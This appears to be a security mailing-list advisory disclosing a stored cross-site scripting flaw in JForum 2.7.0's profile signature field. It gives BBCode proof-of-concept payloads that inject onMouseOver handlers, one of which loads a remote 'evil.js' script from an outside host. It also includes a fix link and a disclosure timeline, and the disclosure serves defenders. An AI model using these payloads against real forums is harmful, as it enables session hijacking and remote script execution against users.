hi,

   I found a vulnerability in the jforum 2.7.0. It is a storage cross site
script vulnerability. The place is the user's profile - signature. The
technique of the vulnerability is the same as that described in this
article "STORED CROSS SITE SCRIPTING IN BBCODE" (
https://mindedsecurity.com/advisories/msa130510/), and the POC is:

color tag:
[color=red" onMouseOver="alert('xss')]XSS[/color]
[color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js')
;"]XSS[/color]
Renders into HTML:
<font onmouseover="alert('xss')" color="red">XSS</font>
<font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');"
color="red">XSS</font>

img tag:
[img]/demo.jpg" onMouseOver="alert('xss')[/img]
Renders into HTML:
<img src="/demo.jpg" onmouseover="alert('xss')" alt="image">

url= tag:
[url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
Renders into HTML:
<a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')"
target="_blank">test</a>

through analysis, the forum has set the cookie to http-only, but the
attacker can use the $.getScript to do some evil things.

this vulnerability has been fixed in
https://sourceforge.net/p/jforum2/code/934/ .

timeline:
2021-04-21 announce the developer of Jforum by e-mail
2021-04-22 Jforum fixed the vulnerability, and will include this fix in
next release
2021-09-02 send this mail to bugtraq&fulldisclosure